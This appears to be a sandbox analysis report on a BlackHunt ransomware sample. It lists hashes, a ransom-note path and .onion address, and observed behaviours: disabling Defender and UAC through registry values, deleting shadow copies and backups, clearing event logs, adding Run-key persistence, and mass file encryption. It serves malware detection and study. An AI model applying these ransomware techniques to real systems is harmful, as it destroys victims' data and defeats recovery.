Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:26
Static task
static1
Behavioral task
behavioral1
Sample
a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe
Resource
win10v2004-20231215-en
General
-
Target
a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe
-
Size
707KB
-
MD5
44b6d4b99f2118f71a4439f5b8542bcd
-
SHA1
6574c6d80bb84401c71ece877c7709bb8e42d725
-
SHA256
a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206
-
SHA512
2c6decf55f8f81cdba7ca343090bce06dd4bb987487c332e1b64ec1c1de780d638486facfb6958446cc792bf5e098b4522a239552ef3fa9160494c0fb2cb8d60
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1A8Dvnh:6uaTmkZJ+naie5OTamgEoKxLWLjh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1092 fsutil.exe 616 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1992 wevtutil.exe 3852 wevtutil.exe 3004 wevtutil.exe 3592 wevtutil.exe 3044 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3948 bcdedit.exe 2720 bcdedit.exe 3256 bcdedit.exe 3492 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1612 wbadmin.exe 3916 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1648 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\O: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\U: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\A: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\G: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\Z: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\M: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\J: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\L: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\B: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\T: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\H: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\K: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\R: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\V: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\E: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\S: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\N: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\Y: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\P: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\X: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened (read-only) \??\W: a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\Java\jre7\lib\zi\America\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#BlackHunt_ReadMe.txt a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files (x86)\Google\Update\Install\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_Private.key a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1904 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2172 vssadmin.exe 4012 vssadmin.exe 4004 vssadmin.exe 2800 vssadmin.exe 1596 vssadmin.exe 3932 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2512 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Process not Found Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2256 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2416 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeRestorePrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeBackupPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeTakeOwnershipPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeAuditPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeSecurityPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeIncBasePriorityPrivilege 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Token: SeBackupPrivilege 3404 vssvc.exe Token: SeRestorePrivilege 3404 vssvc.exe Token: SeAuditPrivilege 3404 vssvc.exe Token: SeBackupPrivilege 2796 wbengine.exe Token: SeRestorePrivilege 2796 wbengine.exe Token: SeSecurityPrivilege 2796 wbengine.exe Token: SeSecurityPrivilege 1992 wevtutil.exe Token: SeBackupPrivilege 1992 wevtutil.exe Token: SeSecurityPrivilege 3004 wevtutil.exe Token: SeBackupPrivilege 3004 wevtutil.exe Token: SeSecurityPrivilege 3852 wevtutil.exe Token: SeBackupPrivilege 3852 wevtutil.exe Token: SeSecurityPrivilege 3592 wevtutil.exe Token: SeBackupPrivilege 3592 wevtutil.exe Token: SeSecurityPrivilege 3044 wevtutil.exe Token: SeBackupPrivilege 3044 wevtutil.exe Token: SeDebugPrivilege 2512 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2888 wrote to memory of 2040 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 155 PID 2888 wrote to memory of 2040 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 155 PID 2888 wrote to memory of 2040 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 155 PID 2888 wrote to memory of 2040 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 155 PID 2888 wrote to memory of 2028 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 153 PID 2888 wrote to memory of 2028 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 153 PID 2888 wrote to memory of 2028 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 153 PID 2888 wrote to memory of 2028 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 153 PID 2888 wrote to memory of 2916 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 152 PID 2888 wrote to memory of 2916 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 152 PID 2888 wrote to memory of 2916 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 152 PID 2888 wrote to memory of 2916 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 152 PID 2888 wrote to memory of 1816 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 63 PID 2888 wrote to memory of 1816 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 63 PID 2888 wrote to memory of 1816 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 63 PID 2888 wrote to memory of 1816 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 63 PID 2040 wrote to memory of 2292 2040 cmd.exe 150 PID 2040 wrote to memory of 2292 2040 cmd.exe 150 PID 2040 wrote to memory of 2292 2040 cmd.exe 150 PID 2888 wrote to memory of 2564 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 149 PID 2888 wrote to memory of 2564 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 149 PID 2888 wrote to memory of 2564 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 149 PID 2888 wrote to memory of 2564 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 149 PID 2916 wrote to memory of 2584 2916 cmd.exe 148 PID 2916 wrote to memory of 2584 2916 cmd.exe 148 PID 2916 wrote to memory of 2584 2916 cmd.exe 148 PID 2888 wrote to memory of 2644 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 146 PID 2888 wrote to memory of 2644 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 146 PID 2888 wrote to memory of 2644 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 146 PID 2888 wrote to memory of 2644 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 146 PID 2888 wrote to memory of 2684 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 143 PID 2888 wrote to memory of 2684 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 143 PID 2888 wrote to memory of 2684 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 143 PID 2888 wrote to memory of 2684 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 143 PID 2888 wrote to memory of 2648 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 142 PID 2888 wrote to memory of 2648 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 142 PID 2888 wrote to memory of 2648 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 142 PID 2888 wrote to memory of 2648 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 142 PID 2028 wrote to memory of 2600 2028 cmd.exe 32 PID 2028 wrote to memory of 2600 2028 cmd.exe 32 PID 2028 wrote to memory of 2600 2028 cmd.exe 32 PID 2888 wrote to memory of 2952 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 141 PID 2888 wrote to memory of 2952 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 141 PID 2888 wrote to memory of 2952 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 141 PID 2888 wrote to memory of 2952 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 141 PID 2888 wrote to memory of 2724 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 140 PID 2888 wrote to memory of 2724 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 140 PID 2888 wrote to memory of 2724 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 140 PID 2888 wrote to memory of 2724 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 140 PID 2888 wrote to memory of 2768 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 138 PID 2888 wrote to memory of 2768 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 138 PID 2888 wrote to memory of 2768 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 138 PID 2888 wrote to memory of 2768 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 138 PID 2888 wrote to memory of 2592 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 135 PID 